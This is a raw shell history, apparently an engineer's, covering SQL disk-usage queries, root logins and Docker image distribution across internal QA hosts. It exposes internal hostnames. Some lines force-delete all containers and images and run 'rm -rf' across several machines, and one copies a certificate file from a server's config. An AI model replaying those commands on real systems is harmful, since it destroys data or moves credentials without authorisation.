-q storage.dev.query.akadns.net "" +sql2 -q storage.dev.query.akadns.net 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip' +sql2 -q mega.dev.query.akadns.net 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip' +sql2 -q internal.dev.query.akadns.net 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip' +sql2 -q agg-mega.shared.qa.akamai.com 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip' +sql2 -q agg-mega.shared.qa.akamai.com 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%Usage count%" AND f.machineip = s.ip' +sql2 -q agg-mega.shared.qa.akamai.com 'SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%unregister_netdevice%" AND f.machineip = s.ip' +./marathon.py --app tapioca-safety-service-qa +./marathon.py sqashared --app tapioca-safety-service-qa +./marathon.py sqashared --app otm-reporting-api-qa +./marathon.py sqashared +clear +gwsh root@qa-docker15.qaextranet.akamai.com +gwsh +telnet 22 +clear +ssh root@ +clear +find . -name "*query*" +find . -name "*query.networks*" +gwsh p4-mesos01.extranet.akamai.com +ping internal.dev.query.akadns.net +/u4/syscomm/bin/query2-networkid pulsar +kinit +/u4/syscomm/bin/query2-networkid pulsar +/u4/syscomm/bin/query2-networkid portal +/u4/syscomm/bin/query2-networkid internal +/u4/syscomm/bin/query2-networkid interna +/u4/syscomm/bin/query2-networkid interaa +/u4/syscomm/bin/query2-networkid pulsar +vim /u4/syscomm/bin/query2-networkid +/u4/syscomm/bin/query2-networkid pulsar +gwsh root@ +gwsh root@ +kmi-client-check shared -r release-Pulsar-9169-2017-04-04-18-22-56_apilakat - +vim /tmp/kmi-client-check-label.log +/usr/bin/sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_sessi +on WHERE targetip in (,,,,,,,,,,,,,192.168.6 +4.45,,,,,,,,,,,,,,,192.168.64. +130,,,,,,,,,,,,,, +,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54 + + +/usr/bin/sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_session WHERE targetip in (,,,,,,,,,,,,,,,,,,,,,,,,,,,,192.168.64. +130,,,,,,,,,,,,,,,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54 +/usr/bin/sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_session WHERE targetip in (,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54 +/usr/bin/sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_session WHERE targetip in (,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54) +sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_session WHERE targetip in (,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54) +sql2 -q agg-ness.shared.qa.akamai.com "SELECT result, targetip AS auditedip, machineip AS auditserver, session_serial, adset AS label, time AS last_audit_time FROM auditserver_audit_session WHERE targetip in (,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, GROUP BY 2,1 ORDER BY 6 DESC LIMIT 54" +clear +~/Downloads/scripts/keypush.sh --cleanold --audit audit.shared.qa.akamai.com,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +~/Downloads/scripts/keypush.sh --cleanold --audit audit.shared.qa.akamai.com +~/Downloads/scripts/keypush.sh -g --cleanold --audit audit.shared.qa.akamai.com +~/Downloads/scripts/keypush.sh --gwsh --cleanold --audit audit.shared.qa.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +clear +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, " + +sql2 -q mega.dev.query.akadns.net "SELECT wr.machineIP ip_key, NVL(bavail, 0) * NVL(bsize, 0) / 1048576 MB_free, NVL(bavail, 0) * NVL(bsize, 0) / 1048576 threshold_value, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND bavail * bsize < 1536000000" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, NVL(bavail, 0) * NVL(bsize, 0) / 1048576 MB_free, NVL(bavail, 0) * NVL(bsize, 0) / 1048576 threshold_value, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND bavail * bsize < 1536000000" +sql2 -q internal.dev.query.akadns.net "ELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 25.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 25.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 50.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 75.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 90.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 985.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +clear +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 85.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +FROM machinedetails WHERE network = 'pulsar')" +gwsh +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 88.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 88.0 AND wr.machineIP IN (SELECT machineip FROM machinedetails WHERE network = 'pulsar')" +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 88.0)" +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 88.0))" +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 88.0" +sql2 -q agg-ness.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" +sql2 -q agg-mega.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" +sql2 -q agg-mega.shared.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" | grep 64 +clear +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" | grep 64 +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" | grep 24 +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" | grep "192.168.24.*" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0" | less +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND installgroup=30" | less +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND region=4117" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND physregion=4117" +vim kmi-client-check +./kmi-client-check sqa2 -r release-pulsar-9590-2017-04-20-17-57 - +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND physregion=4117" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND physregion=4117 AND installgroup=30" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND network=pulsar" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND subnetwork=pulsar" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND subnetwork='pulsar'" +sql2 -q internal.dev.query.akadns.net "SELECT wr.machineIP ip_key, physregion, bavail Blocks_Available, blocks Blocks_Total, (bavail / CAST(blocks AS float)) * 100 Percentage_available, mountpt, wr.installgroup installgroup FROM whoruns wr LEFT OUTER JOIN filesys fs ON fs.machineip = wr.machineip WHERE mountpt = '/usr/local/akamai/logs' AND (bavail / CAST(blocks AS float)) * 100 < 99.0 AND subnetwork='pulsar'" +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'" +sql2 -q agg-mega.sqa1.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'" + +gwsh root@qa-mesos01.qaextranet.akamai.com +sql2 -q agg-mega.sqa1.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 -q agg-mega.shared.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +gwsh root@qa-mesos01.qaextranet.akamai.com +ping agg-mega.sqa2.qa.akamai.com +ssh root@ +man p4 +p4 log //projects/qa/hardware/configurations/configuration.sqa2.infra +p4 history //projects/qa/hardware/configurations/configuration.sqa2.infra +p4 filelog //projects/qa/hardware/configurations/configuration.sqa2.infra +ssh root@ +gwsh root@qa-mesos01.qaextranet.akamai.com +ping internal.sqa2.qa.akamai.com +ping agg-internal.sqa2.qa.akamai.com +sql2 -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +sql2 -q agg-portal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +sql2 -q agg-infra.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +ssh root@ +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +ssh root@ +sql2 -q internal.dev.query.akadns.net "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'portal'"; +sql2 -q agg-mega.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 -v -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +sql2 --debug -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +ping agg-internal.sqa2.qa.akamai.com +sql2 --debug -q agg-internal.sqa2.qa.akamai.com "SELECT + machineip +FROM machinedetails +WHERE network = 'pulsar'"; +telnet agg-internal.sqa2.qa.akamai.com 9050 +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +docker rmi -f': for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'rm -rf /ghostcache/pulsar-docker-store/image/aufs/distribution'; echo ""; done +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4-release.tar root@HOST:/tmp" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker load < /tmp/tomcat8-2.4-release.tar'" +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker load < /tmp/tomcat8-2.4-release.tar'" +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +ssh lsg-east +bmon +sudo apt-get install bmon +bmon +slurm +sudo apt-get install slurm +sudo apt-get purge bmon +sudo apt-get remove bmon +sudo slurm +tcptrack +sudo apt-get install tcptrack +tcptrack +tcptrack -i eth0 +sudo tcptrack -i eth0 +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker04.sqaextranet.akamai.com +sudo apt-get update +sudo apt-get dist-upgrade +clear +gwsh root@sqa-docker01.sqaextranet.akamai.com +gwsh root@qa-docker01.qaextranet.akamai.com +ping qa-docker01.qaextranet.akamai.com +ping sqa-docker01.qqaextranet.akamai.com +ping sqa-docker01.sqaextranet.akamai.com +vim 3.9.1-RELEASE +cat 3.9.1-RELEASE | jq .fsLayers +cat 3.9.1-RELEASE | jq .fsLayers.[] +cat 3.9.1-RELEASE | jq .fsLayers.blobSum +cat 3.9.1-RELEASE | jq .fsLayers.[].blobSum +cat 3.9.1-RELEASE | jq .fsLayers.blobSum +cat 3.9.1-RELEASE | jq .fsLayers | jq . +cat 3.9.1-RELEASE | jq .fsLayers | jq .blobSum +cat 3.9.1-RELEASE | jq .fsLayers | jq .[] +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum +cat 3.9.1-RELEASE | jq .fsLayers.[].blobSum +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum +clear +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | sed -i 's/sha256//g' +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | sed -i 's/sha//g' +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | sed -i 's/sha256//g' +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | cut -d':' -fe- +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | cut -d':' -f2- +clear +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | cut -d':' -f2- +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | cut -d':' -f2- | sort +clear +cat 3.9.1-RELEASE | jq .fsLayers | jq .[].blobSum | sed -e 's/^"//' -e 's/"$//' | cut -d':' -f2- | sort +docker images +docker pull pdr.akamai.com/pulsar/core-authz:3.9.1-RELEASE +sudo su +sudo docker run --rm -v /var/lib/docker:/var/lib/docker docker/v1.10-migrator +ls -lrt | grep jira +ls -lrt +scp root@pulsar-dashboard.sqa2.qa.akamai.com:/a/pulsar_dashboard/conf/shadow/jira_* . +scp root@pulsar-dashboard.sqa2.qa.akamai.com:/a/pulsar_dashboard/conf/shadow/jira_certificate.pfx . +ssh root@pulsar_dashboard.sqa2.qa.akamai.com +docker pull pdr-qa.akamai.com/pulsar/test-java:1.0.1-RELEASE +docker images +docker inspect ef0 +docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE +docker images +docker rmi $(docker images -a -q) +clear +docker images +clear +docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE +docker save pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE > tomcat8-2.4-release.tar +ls -lrt +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "rsync -crlvz -e 'ssh -p 22' --stats --progress tomcat8-2.4.release.tar user@HOST:/tmp" +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4.release.tar user@HOST:/tmp" +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4.release.tar root@HOST:/tmp" +ls -lrt +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4.release.tar root@HOST:/tmp" +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4-release.tar root@HOST:/tmp" +echo -n $_HOSTS | parallel --will-cite -j 5 rsync -avzm --relative --stats --safe-links --ignore-existing --human-readable {} ~/tomcat8-2.4-release.tar REMOTE-HOST:/tmp +echo -n $_HOSTS | parallel -j 5 rsync -avzm --relative --stats --safe-links --ignore-existing --human-readable {} ~/tomcat8-2.4-release.tar REMOTE-HOST:/tmp +echo -n $_HOSTS | parallel -j 5 rsync -avzm --relative --stats --safe-links --ignore-existing --human-readable {} ~/tomcat8-2.4-release.tar root@HOST:/tmp +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -j 5 rsync -avzm --relative --stats --safe-links --ignore-existing --human-readable {} ~/tomcat8-2.4-release.tar root@HOST:/tmp +echo -n $_HOSTS | parallel -j 5 rsync -arve --stats --progress --human-readable {} ~/tomcat8-2.4-release.tar root@HOST:/tmp +echo -n $_HOSTS | parallel -j 5 rsync -arve gwsh --stats --progress --human-readable {} ~/tomcat8-2.4-release.tar root@HOST:/tmp +echo -n $_HOSTS | parallel -j 5 rsync -arv -e gwsh --stats --progress --human-readable {} 